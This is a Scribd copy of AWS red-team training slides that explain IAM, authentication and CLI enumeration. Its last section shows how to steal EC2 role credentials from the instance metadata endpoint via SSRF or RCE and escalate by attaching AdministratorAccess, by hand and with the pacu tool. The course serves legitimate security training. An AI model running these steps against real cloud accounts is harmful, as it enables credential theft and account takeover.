Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
726 views54 pages

MCRTA Study Material-AWS PDF

MCRTA AWS

Uploaded by

Juan David Carrillo Romero
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
726 views54 pages

MCRTA Study Material-AWS PDF

MCRTA AWS

Uploaded by

Juan David Carrillo Romero
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 54

Multi-Cloud Red Team

Analyst (MCRTA) : AWS

© All Rights Reserved CyberWarFare Labs


Red Teaming in AWS Cloud Environment

1. Introduction to AWS Cloud

2. Authentication Methods

3. CLI Based Enumeration

4. Red Team Ops in AWS Cloud

© All Rights Reserved CyberWarFare Labs


1. Introduction to AWS Cloud

© All Rights Reserved CyberWarFare Labs


1.1 AWS Cloud Architecture

Cloud Space
Compute

AWS Web Portal AWS Services


Control
GUI Storage
Plane
Data Plane

• Long Term Key : Access Key ID & Secret


• IAM Username & Password
• SSO Username & Password Web Client AWS CLI SDK/API • Short Term Key : Access Key ID & Secret &
Token
End User

© All Rights Reserved CyberWarFare Labs


1.2 AWS Cloud Services :
EC2 Lambda ECS|EKS

VPC

Networking
Compute
IAM

Identity Access
Management
AWS
services

SSO
Security
Storage
IAM
Cloud Trail
EBS
S3
CloudWatch Guard duty RDS

© All Rights Reserved CyberWarFare Labs


1.3 Identity and Access Management

IAM :
➤ AWS Identity and Access Management (IAM) enables you to manage access to AWS services
and resources securely.
➤ IAM allow you can create and manage AWS users and groups and use permissions to allow
and deny their access to AWS resources.

AWS IAM allows:


1. Manage IAM users, groups and their access.
2. Manage IAM roles and their permissions.
3. Manage federated users and their permissions.

© All Rights Reserved CyberWarFare Labs


IAM

Users Groups Roles AWS


Role Attached Services
Po to Services
Policy
Us licy Attached ed
er At ch
tac tta s
h to Groups A
ed licy ole
to Po to R

Policy

Effect Actions Resources


Policy Contains Permissions

© All Rights Reserved CyberWarFare Labs


A. Users

➤ An AWS Identity and Access Management (IAM) user is an entity that you create in AWS to

represent the person or application that uses it to interact with AWS.

➤ A user in AWS consists of a name and credentials.

© All Rights Reserved CyberWarFare Labs


B. Groups

➤ An IAM group is a collection of IAM users. Groups let you specify permissions for multiple

users, which can make it easier to manage the permissions for those users

© All Rights Reserved CyberWarFare Labs


C. Roles

➤ An IAM role is an IAM entity that defines a set of permissions for making AWS service requests.

➤ IAM roles are associated with AWS services such as EC2, RDS etc.

© All Rights Reserved CyberWarFare Labs


Role for EC2 services
IAM

Role Attach to EC2 Instance

Full permission

EC2 Instance can access S3 Bucket


EC2 S3

© All Rights Reserved CyberWarFare Labs


IAM Role has trusted entity to EC2. So EC2 can assume this role.

© All Rights Reserved CyberWarFare Labs


D. Policies

➤ IAM policies define permissions for an action to perform the operation.

➤ For example, if a policy allows the GetUser action, then a user with that policy can get user

information from the AWS Management Console, the AWS CLI, or the AWS API.

➤ Policies can be attached to IAM identities (users, groups or roles) or AWS resources.

© All Rights Reserved CyberWarFare Labs


© All Rights Reserved CyberWarFare Labs
Policy Data :

➤ Effect - Use to Allow or Deny Access

➤ Action - Include a list of actions (Get, Put, Delete) that the policy allows or denies.

➤ Resource - A list of resources to which the actions apply

© All Rights Reserved CyberWarFare Labs


Policy types:

➤ Inline Policies - An inline policy is a policy that's embedded in an IAM identity (a

user, group, or role)


➤ Managed Policies -

■ AWS Managed Policies

■ Customer Managed Policies

© All Rights Reserved CyberWarFare Labs


© All Rights Reserved CyberWarFare Labs
2. Authentication Methods

© All Rights Reserved CyberWarFare Labs


2.1 AWS Cloud Authentication :

Credentials

Long Term Short Term


Credential Credential

Graphical User Interface Programmatic Programmatic Interface


(GUI) Interface (CLI/ SDK) (CLI/ SDK)

Access Key ID
IAM Username & Password Access Key ID Secret Access Key
SSO Username & Password Secret Access Key Session Token

© All Rights Reserved CyberWarFare Labs


2.1.1 Authentication to AWS Management Portal

➤ IAM Root User’s credential [Username + Password] - Long Term Access

➤ IAM User’s credential [Username + Password] - Long Term Access

➤ SSO User’s credential [Username + Password] - Long Term Access

© All Rights Reserved CyberWarFare Labs


➤ IAM Root User’s credential [Username + Password]:

https://console.aws.amazon.com/

© All Rights Reserved CyberWarFare Labs


➤ IAM User’s credential [Username + Password]:

https://console.aws.amazon.com/

© All Rights Reserved CyberWarFare Labs


➤ SSO User’s credential [Username + Password]:

https://Org-Name.awsapps.com/start

© All Rights Reserved CyberWarFare Labs


2.1.2 Authentication to AWS using AWS CLI

➤ Long Term : Access Key ID + Access Key Secret

➤ Short Term : Access Key ID + Access Key Secret + Session Token

© All Rights Reserved CyberWarFare Labs


Programmatic Access ( Access Key ID + Access Key Secret )

aws configure --profile atomic-nuclear

© All Rights Reserved CyberWarFare Labs


Get the information about configured identity

aws sts get-caller-identity --profile atomic-nuclear

© All Rights Reserved CyberWarFare Labs


Programmatic Access ( Access Key ID + Access Key Secret + Session Token )

aws configure

© All Rights Reserved CyberWarFare Labs


Get the information about configured identity

aws sts get-caller-identity --profile atomic-nuclear

© All Rights Reserved CyberWarFare Labs


AWS CLI Stored Credentials

Windows
C:\Users\UserName\.aws

© All Rights Reserved CyberWarFare Labs


AWS CLI Stored Credentials

Linux
/home/UserName/.aws

© All Rights Reserved CyberWarFare Labs


Content of credentials file

cat credentials

© All Rights Reserved CyberWarFare Labs


3. CLI Based Enumeration

© All Rights Reserved CyberWarFare Labs


2.1.3 Enumeration

Users:

List of IAM Users :

aws iam list-users

List the IAM groups that the specified IAM user belongs to :

aws iam list-groups-for-user --user-name [user-name]

© All Rights Reserved CyberWarFare Labs


List all manages policies that are attached to the specified IAM user :

aws iam list-attached-user-policies --user-name [user-name]

Lists the names of the inline policies embedded in the specified IAM user :

aws iam list-user-policies --user-name [user-name]

© All Rights Reserved CyberWarFare Labs


Groups :

List of IAM Groups :

aws iam list-groups

List of all users in a groups :

aws iam get-group --group-name [group-name]

© All Rights Reserved CyberWarFare Labs


Lists all managed policies that are attached to the specified IAM Group :

aws iam list-attached-group-policies --group-name [group-name]

List the names of the inline policies embedded in the specified IAM Group:

aws iam list-group-policies --group-name [group-name]

© All Rights Reserved CyberWarFare Labs


Roles :

List of IAM Roles :

aws iam list-roles

Lists all managed policies that are attached to the specified IAM role :

aws iam list-attached-role-policies --role-name [ role-name]

List the names of the inline policies embedded in the specified IAM role :

aws iam list-role-policies --role-name [ role-name]

© All Rights Reserved CyberWarFare Labs


Policies:

List of all iam policies :

aws iam list-policies

Retrieves information about the specified managed policy :

aws iam get-policy --policy-arn [policy-arn]

Lists information about the versions of the specified manages policy :

aws iam list-policy-versions --policy-arn [policy-arn]

© All Rights Reserved CyberWarFare Labs


Retrieved information about the specified version of the specified managed policy :

aws iam get-policy-version --policy-arn policy-arn --version-id [version-id]

Retrieves the specified inline policy document that is embedded on the specified IAM user / group / role :

aws iam get-user-policy --user-name user-name --policy-name [policy-name]

aws iam get-group-policy --group-name group-name --policy-name [policy-name]

aws iam get-role-policy --role-name role-name --policy-name [policy-name]

© All Rights Reserved CyberWarFare Labs


4. Red Team Ops in AWS Cloud

© All Rights Reserved CyberWarFare Labs


Cloud Red Team Attack Life Cycle

© All Rights Reserved CyberWarFare Labs


Configure Initial Compromised User Credential :

aws configure --profile auditor

© All Rights Reserved CyberWarFare Labs


Enumerate Cloud Services, e.g EC2, S3 etc. in an Organization AWS Account :

aws ec2 describe-instances --profile auditor

© All Rights Reserved CyberWarFare Labs


Exploit Public Facing Application Running on EC2 Instance and Retrieve Temporary Credential :

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/jump-ec2-role

Note: Cloud meta-data can be retrieve by exploiting these web app vulnerabilities -

● SSRF
● RCE

© All Rights Reserved CyberWarFare Labs


Configure & Validate Temporary Credential in AWS CLI :

aws configure set aws_access_key_id [key-id] --profile ec2

aws configure set aws_secret_access_key [key-id] --profile ec2

aws configure set aws_session_token [token] --profile ec2

aws sts get-caller-identity --profile ec2

© All Rights Reserved CyberWarFare Labs


Get the Managed Policy Attached to EC2 Instance :

aws iam list-attached-role-policies --role-name jump-ec2-role --profile


auditor

Retrieves the specified inline policy document that is embedded on the ec2 instance role :

aws iam list-role-policies --role-name jump-ec2-role --profile auditor

Get the permissions in inline policy :

aws iam get-role-policy --role-name jump-ec2-role --policy-name jump-inline-policy

--profile auditor

© All Rights Reserved CyberWarFare Labs


Escalate privilege by attaching administrator policy to itself :

aws iam attach-role-policy --policy-arn


arn:aws:iam::aws:policy/AdministratorAccess --role-name jump-ec2-role --profile ec2

© All Rights Reserved CyberWarFare Labs


Again, check the managed Policy Attached to EC2 Instance :

aws iam list-attached-role-policies --role-name jump-ec2-role --profile auditor

© All Rights Reserved CyberWarFare Labs


Red Team Ops with Automated Tool “pacu” :

Setting the initial user access key in pacu

set_keys

Get the permission of current logged-in user

exec iam__enum_permissions

whoami

© All Rights Reserved CyberWarFare Labs


Enumerate ec2 instance and get the public ip addresses.

exec ec2__enum

data EC2

© All Rights Reserved CyberWarFare Labs


Set the temporary credential for role attached to ec2 instance.

set_keys

Get the permission of current logged-in role.

exec iam__enum_permissions

whoami

© All Rights Reserved CyberWarFare Labs


Enumerate privilege escalation permission and exploit it.

exec iam__privesc_scan

Again, check the permission of privilege escalated role.

exec iam__enum_permissions

whoami

© All Rights Reserved CyberWarFare Labs


CWL Cloud Security Certifications Path

© All Rights Reserved CyberWarFare Labs


Thank You
For Professional Red Team / Blue Team / Purple Team,
Cloud Cyber Range labs / Courses / Trainings, please contact

[email protected]

To know more about our offerings, please visit:


https://cyberwarfare.live

© All Rights Reserved CyberWarFare Labs

You might also like